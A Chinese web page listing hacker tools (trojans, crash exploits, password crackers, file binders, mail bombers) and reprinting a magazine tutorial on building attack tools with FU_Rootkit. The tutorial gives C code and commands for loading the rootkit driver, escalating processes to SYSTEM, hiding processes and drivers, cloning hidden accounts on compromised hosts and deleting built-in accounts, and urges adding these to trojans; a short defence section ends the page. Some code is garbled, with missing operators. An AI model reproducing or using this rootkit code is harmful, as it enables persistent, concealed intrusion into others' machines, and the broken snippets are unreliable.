本文目录一览:
黑客常用工具有哪些
冰河
冰河是最优秀的国产木马程序之一,同时也是被使用最多的一种木马 。说句心里话,如果这个软件做成规规矩矩的商业用远程控制软件,绝对不会逊于那个体积庞大、操作复杂的PCanywhere,但可惜的是,它最终变成了黑客常用的工具。
Wnuke
Wnuke可以利用Windows系统的漏洞, 通过TCP/IP协议向远程机器发送一段信息,导致一个OOB错误,使之崩溃。现象:电脑屏幕上出现一个蓝底白字的提示:“系统出现异常错误”,按ESC键后又回到原来的状态,或者死机。它可以攻击WIN9X、WINNT、WIN2000等系统,并且可以自由设置包的大小和个数,通过连续攻击导致对方死机。
Shed
Shed是基于NetBIOS的攻击Windows的软件。NetBIOS(Network Basic Input Output System,网络基本输入输出系统),是一种应用程序接口(API),作用是为局域网(LAN)添加特殊功能,几乎所有的局域网电脑都是在NetBIOS基础上工作的。在我们的Windows 95、99、或Me中,NetBIOS是和TCP/IP捆绑在一起的,这是十分危险的!但当我们安装TCP/IP协议时,默认情况下NetBIOS和它的文件与打印共享功能也一起被装进了系统。当NetBIOS运行时,你的后门打开了:因为NetBIOS不光允许局域网内的用户访问你的硬盘资源,Internet上的黑客也能!Shed正是利用了这一点
溯雪
溯雪还是小榕的作品。该软件利用asp、cgi对免费信箱、论坛、聊天室进行密码探测的软件。密码探测主要是通过猜测生日的方法来实现,成功率可达60%-70%。溯雪的运行原理是通过提取asp、cgi页面表单,搜寻表单运行后的错误标志,有了错误标志后,再挂上字典文件来破解信箱密码。用溯雪来探测信箱密码真的是很容易,由于许多人对密码的设置采用了自己的生日或常用英文单词等较简单的方式,这给溯雪留下了很大的施展空间。我曾用自己的信箱做过试验,采用生日作为密码,溯雪只用了不到3分钟就成功的破解出了我的密码!要知道我用的字典很大,若字典再小些,会更快的!
流光
流光这是国人小榕的作品,当我首次使用这个软件时,我被它深深地震住了。这个软件能让一个刚刚会用鼠标的人成为专业级黑客,它可以探测POP3、FTP、HTTP、PROXY、FORM、SQL、SMTP、IPC$ 上的各种漏洞,并针对各种漏洞设计了不同的破解方案,能够在有漏洞的系统上轻易得到被探测的用户密码。流光对WIN9X、WINNT、WIN2000上的漏洞都可以探测,使它成为许多黑客手中的必备工具之一,一些资深黑客也对它青睐有加。
ExeBind
ExeBind可以将指定的黑客程序捆绑到任何一个广为传播的热门软件上,使宿主程序执行时,寄生程序(黑客程序)也在后台被执行。当您再次上网时,您已经在不知不觉中被控制住了。您说这个文件捆绑专家恐怖不?而且它支持多重捆绑。实际上是通过多次分割文件,多次从父进程中调用子进程来实现的。现象:几乎无。危害:NetSpy、HDFILL、BO 2000常通过这种形式在Internet上寄生传播。如果有一天您收到一个不相识的人发来的不错的程序,请仔细检查一下,因为没准它是用ExeBind捆绑了木马程序!
Superscan
是一个功能强大的扫描器,速度奇快,探测台湾全部回应值小于200MS的IP段仅用6个小时。可以查看本机IP地址和域名,扫描一个IP段的所有在线主机以及其可探测到的端口号。而且可以保存和导入所有已探测的信息。
HackerScan
邮箱终结者类似的邮箱炸弹很多,它们的原理基本一致,最根本的目标就是涨破您的邮箱,使您无法正常收发E-mail。
fu_rootkit
fu_rootkit可以隐藏进程和驱动,改变进程令牌和SID,例举用hook技术隐藏的进程和驱动,而且它是公开源代码的。
===============================================
我在2004年11期黑防上刊登了《小工具巧删Guest/Administrator账户》这篇文章,有不少朋友来信询问工具是如何编写的,其实这个工具里面大部分代码是我拷贝FU_Rootkit过来的。既然朋友们喜欢,这几天我又多了好多想法,那我就来讲讲怎么充分挖掘利用FU_Rootkit吧!
先去把FU_Rootkit 给Down下来,以前它在Windows 2000专业版下面提升进程权限有问题,新版本已经修复这个问题。FU_Rootkit也算是“养在深闺人未识”了,比起Hxdef、AFX RootKit来名气小多了,不过是金子终究是要发光的,这不,今天我们就让它来发光了!
FU_Rootkit是开源的,用C语言编写,很容易移植。我的开发环境是Windows 2000+SP4+VC6.0。FU_Rootkit主程序包括2个部分:Fu.exe和Msdirectx.sys。 Msdirectx.sys能直接载入核心内存,Fu.exe则是相应的应用程序。先来看看它的部分功能:
[-pl] xxx 列举所有运行进程
[-ph] #PID 隐藏进程标识符为PID的进程
[-pld] 列举所有载入驱动程序
[-phd] DRIVER_NAME 隐藏指定驱动
[-pas] #PID 提升进程标识符为PID的进程权限至SYSTEM
[-prl] 列出可用的权限名单
[-prs] #PID #privilege_name 提升进程标识符为PID的进程权限至指定权限
[-pss] #PID #account_name 改变进程令牌和SID
可以看出FU_Rootkit不仅可以隐藏进程和驱动,改变进程令牌和SID,还可以例举用Hook技术隐藏的进程和驱动。我们今天要做的就是利用Msdirectx.sys完成我们自己的黑客工具集的编写!
权限提升
有了权限我们才能任意地操作,让电脑为我们实现各种功能,所以第一步首先是权限提升。
我们知道,提升进程权限可以用Psu工具,FU_Rootkit也能够实现这个功能,它可以将任意进程提升到SYSTEM权限——不光可以给其它进程提升权限,还可以把自己的进程也提升为SYSTEM权限哦(在下面的文章中你将可以看到这个功能是多么的有用)!
第一步:载入Msdirectx.sys
具体代码见InitDriver()函数。其实朋友们大可不必完全看懂这些代码,把函数直接拷贝过去就OK了。
第二步:查找进程的PID
代码如下:
const char DESTPROC[19] = "UserManager.exe"; // UserManager.exe是程序的进程名称
AddPrivilege(SE_DEBUG_NAME); //提升进程DEBUG权限
HANDLE hRemoteProcess = NULL;
DWORD pid = ProcessToPID(DESTPROC);//这里的pid就是我们进程PID
// ProcessToPID函数如下:
DWORD ProcessToPID(const char *InputProcessName)
//将进程名转换成进程PID的函数
{
DWORD aProcesses[1024], cbNeeded, cProcesses;
unsigned int i;
HANDLE hProcess = NULL;
HMODULE hMod = NULL;
char szProcessName[MAX_PATH] = "UnknownProcess";
//提升进程权限至DEBUG权限
AddPrivilege(SE_DEBUG_NAME);
// 计算目前有多少进程, aProcesses[]用来存放有效的进程PIDs
if ( !EnumProcesses( aProcesses, sizeof(aProcesses), cbNeeded ) )
{
return 0;
}
cProcesses = cbNeeded / sizeof(DWORD);
// 按有效的PID遍历所有的进程
for ( i = 0; i cProcesses; i++ )
{
// 打开特定PID的进程
hProcess = OpenProcess( PROCESS_QUERY_INFORMATION |
PROCESS_VM_READ,
FALSE, aProcesses[i]);
// 取得特定PID的进程名
if ( hProcess )
{
if ( EnumProcessModules( hProcess, hMod, sizeof(hMod), cbNeeded) )
{
GetModuleBaseName( hProcess, hMod, szProcessName, sizeof(szProcessName) );
//将取得的进程名与输入的进程名比较,如相同则返回进程PID
if(!stricmp(szProcessName, InputProcessName))
{
CloseHandle( hProcess );
return aProcesses[i];
}
}
}//end of if ( hProcess )
}//end of for
//没有找到相应的进程名,返回0
CloseHandle( hProcess );
return 0;
}
第三步:提升进程权限至SYSTEM
具体代码见UpdateToSystem()函数。这样我们的进程UserManager.exe就具备了SYSTEM权限了。
攻击篇
当你得到肉鸡的SYSTEM权限后,当然要把自己的后门进程或驱动器隐藏,然后克隆账号,留个隐藏账号什么的,下面我们就来看看这些功能如何用程序来实现。
1.克隆帐号
各位朋友看到小榕的CA工具是不是很眼馋,想不想自己写一个?在黑防2003年的第7期《C语言克隆账号》上已经有具体介绍。一般来讲,克隆账号的方法有2种:一种是利用系统服务的SYSTEM权限读写SAM文件;第二种是利用驱动提升进程权限。我们这里采用第二种办法。在《C语言克隆账号》一文中,由于其不具备SYSTEM权限,需要手工修改注册表才能够操作注册表SAM文件夹,比较麻烦。在我们这里当然是没有问题的,将其代码COPY过来,粘在我们工程里面就可以了。
2.进程隐藏
进程隐藏实乃木马病毒的必备防身本领,FU_Rootkit中的最基本功能之一就是进程隐藏,首先我们要知道进程的PID或者进程名,然后才能将它隐藏,隐藏代码如下:
DWORD HideProc(DWORD pid)//pid是你要隐藏的进程的PID
{
DWORD d_bytesRead;
DWORD success;
if (!Initialized)
{
return ERROR_NOT_READY;
}
success = DeviceIoControl(gh_Device,
IOCTL_ROOTKIT_HIDEME,
(void *) pid,
sizeof(DWORD),
NULL,
0,
d_bytesRead,
NULL);
return success;
}
假如你要想找出隐藏的进程,可以采用工具RTDector0.62工具,黑防以前就介绍过。
3. 驱动隐藏
驱动隐藏?很少见吧。有经验的管理员一般都会使用命令Drivers.exe来查看载入的驱动(Drivers.exe可以在Windows 2000的资源包里面找到),
看到Msdirectx.sys暴露出来了吧?而FU_Rootkit就可以把自己的 Msdirectx.sys隐藏起来,运行的命令是:“C:\fu.exe –phd msdirectx.sys”。当然这个功能我们也可以很轻松地移植到我们的程序中去。
防御篇
千万不要以为FU_Rootkit得到SYSTEM权限只是用来攻击,不能防守,其实Rootkit是一把“双刃剑”,运用得当,同样是防御的好帮手。同时,作为一名菜鸟,当然是防守为先,所以请看防守篇。
1. 系统用户查看
眼下只要翻开一本黑客杂志,经常看到什么“隐藏帐号”、“不死帐号”什么的,吓得我等菜鸟心惊胆颤,经常对着用户管理发呆,究竟有没有问题呢?这里我们可以利用LPUSER_INFO_3读取用户信息,包括用户名、用户全名、用户描述、登录次数、登录权限以及上次登录时间等参数,代码较长而且简单,这里就不贴了,有兴趣的可以查看DWORD CUserManagerDlg::UserALLE()函数。
当然,列举账号可以直接从SAM\\SAM\\Domains\\Account\\Users\\Names\中读取,然后与LPUSER_INFO_3中读出来的账号进行对比,这样就能找出隐藏的账号,将那些隐藏的、不死的统统打回原形,让你把账号看得“清清楚楚,明明白白”。
2. 删除Guest
先来看看如何删除Guest用户吧。获取SYSTEM权限后,只要删除在注册表SAM文件夹中对应的Guest和000001F5文件夹就OK了!
void CUserManagerDlg::Deleteguest()
{
BOOL upResult;
upResult=UpdateToSystem();
//先查看一下进程提示权限至SYSTEM成功没有
if(upResult)//如果权限提升SYSTEM成功的话
{
// 删除GUEST用户!
BOOL dResult;
dResult=DelNT(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account\\Users\\Names\\Guest");//删除Guest文件夹
BOOL dResult2;
dResult2=DelNT(HKEY_LOCAL_MACHINE,"SAM\\SAM\\Domains\\Account\\Users\\000001F5");//删除guest对应的ID号000001F5文件夹
if(dResultdResult2)
{
AfxMessageBox("成功删除GUEST用户!");
}
else
{
AfxMessageBox("删除GUEST用户失败!");
}
}
else
{
AfxMessageBox("提升至SYSTEM权限失败!");
}
}
其中DelNT()函数是专门定义用来删除注册表子键的函数。
3. 删除Administrator
看到标题你可不要吓一跳,Administrator一般情况下是不能删除的,当然你可以到控制面板-管理工具-计算机管理里面重命名该账户,也可以使用NT Resource Kit提供的Passprop工具启用对Administrator的锁定。我们这里当然要挑战极限:删除Administrator!代码跟删除Guest用户的代码差不多,换个参数就可以了,分别删除注册表SAM文件夹中的Administrator和000001F4文件夹就可以了。而且可以在Administrator当前用户下删除,强吧?嘿嘿。假如你只有这么一个管理员账号的话呢,不好意思,恭喜你:你的机器上从此没有管理员了!
小提示:强烈建议删除Administrator之前一定要先创建一个其它名字的管理员账号!据《微软信息安全文集》中说,删除Administrator和Guest系统内置账户有可能导致破坏SAM数据库,不过《微软信息安全文集》的作者同时声明:经他测试,没有发现副作用。
4. 查杀进程篇
朋友们是否经常遇到这种情况:在任务管理器中发现一个未知进程,并且杀不掉,说是权限不够,这个问题在我们获取System权限后就不再是问题,现在病毒、木马等都是双进程,互相监控,给我们查杀进程带来很大不便,需要我们能够同时查杀多个进程。选用Listview控件作为进程的列举控件,将Checkbox选项选中,这样我们就可以同时选中多个进程进行查杀,爽吧?!
5. 列举用Hook技术隐藏的进程和驱动
这个功能就是FU_Rootkit的过人之处了,可以帮助你查找利用HOOK技术隐藏的进程和木马。实现方法比较简单,大家可以去源码中查看ListProc(void *buffer, int buff_size)和ListDriv(void)函数。
本文利用FU_Rootkit获取SYSTEM权限后,完成了很多实用的黑客小工具, System和Administrator权限一般人看起来感觉都差不多,但在一些与系统内核交互的细节上,可以看出System权限要更大一些。譬如说注册表中的某些文件夹、对物理内存有读写能力等方面。因此,获取System权限后所能做的事情远远不止我们上面所说的这些,希望大家共同挖掘。
上有很多开源的好资源,研究并扩展其功能便可以写出很多有用的小软件。将其功能添加到我们小马中去,将会大大提高其生命力。朋友们,现在是不是感觉黑客软件不过如此,人人能写?如果是这样,也不枉费我一番苦心。由于工作关系,时间确实有限,不可能将上面的功能全部一一实现在代码中,其实已经是体力活了,很多功能都只需要把代码COPY进去就可以了。特将删除Guest/Administrator的小工具和FU_Rootkit的代码附上,朋友们升级了可要寄给我一份哦!
一般黑客常用的工具有哪些,要分类型
渗透、免杀、破解、
渗透-综合扫描、目录检测、注入检测、webshell、抓包改包、提权、字典、痕迹清理、
免杀-免杀辅助、脱壳、加壳、加花、
破解-PE工具、调试、反编译、补丁、加壳脱壳、行为监控、网络封包分析、
如果还要分类的话恐怕我整理需要1个多小时太麻烦。
手机黑客工具箱:手机游戏
用dSploit把,局域网渗透软件手机上用的
安装教程:
使用教程:
黑客攻击防御工具有哪些?
黑客若要对我们实施攻击,首先要找到我们的IP地址,否则无从下手。隐藏IP地址常用如下三法: 1、使用代理服务器(Proxy Server):若我们浏览网站、聊天、BBS等,这时留下网址是代理服务器的,而非我们的网址。 2、使用工具软件:Norton Internet Security 具有隐藏IP的功能,若您的电脑前端有路由器、IP共享功能的集线器,则此法无效,因NIS只能隐藏你电脑的IP地址。 3、对于局域网中的电脑,浏览器中的Proxy的地址应设为与Internet连接的那台电脑的地址。 以上措施一定程度上防范了入侵,但仍存在疏漏之处,黑客仍可利用端口扫描找到你的IP地址,更进一步的措施就是“端口防范”。 端口防范 黑客或病毒对您入侵时,要不断地扫描您的计算机端口,如果您安装了端口监视程序(比如Netwatch),该监视程序则会有警告提示。入侵者很可能连续频繁扫描端口以寻找时机,监视程序也会不断地提示您,令您不胜其烦,如果您遇到这种入侵,可用工具软件关闭不用的端口,比如,用“Norton Internet Security ”关闭不用的80和443端口,这两个端口提供HTTP服务,如果您不提供网页浏览服务,尽可 关闭;关闭25和110端口,这两个提供SMTP和POP3服务,不用时也应关闭,其他一些不用端口也可关闭。关闭了这些端口,无异于挡入侵者于大门之外。 在TCP/IP协议上,Windows是通过139端口与其他安装Windows系统的电脑进行连接,关闭此端口,可防范绝大多数的攻击。关闭步骤:[网络]→[配置]→[TCP/IP]→[属性]→[绑定]→[Microsoft网络客户端](把此项前面的“√”去掉,若无此项可不作变动)。 关闭共享和设置密码 若您的电脑非局域网中共享硬盘存取的电脑,可关闭全部硬盘和文件夹共享,步骤是:[网络]→[文件和打印机共享]→[允许其他用户访问我的文件]前面的“√”去掉即可;如若不能关闭所有硬盘或文件夹共享,则对共享的部分需设置只读与密码,步骤是:右键单击某[文件夹]→[共享…],需注意,由于Windows 9x与Windows Me的共享密码极易被破解,而Windows 2K与Windows XP的密码较安全,级您的操作系统是明智之举。 ActiveX控件与Java的防护 网页中ActiveX控件与Java Applets有较强的功能,而对其功能往往是未知的,一旦是恶意所为,破坏是相当大的,不得不防。IE对此也采取了慎重态度,提供了多种选择,具体设置步骤是:[工具]→[Internet选项]→[安全]→[自定义级别],建议您对不了解的网页的ActiveX控件与Java程序采取严防的态度。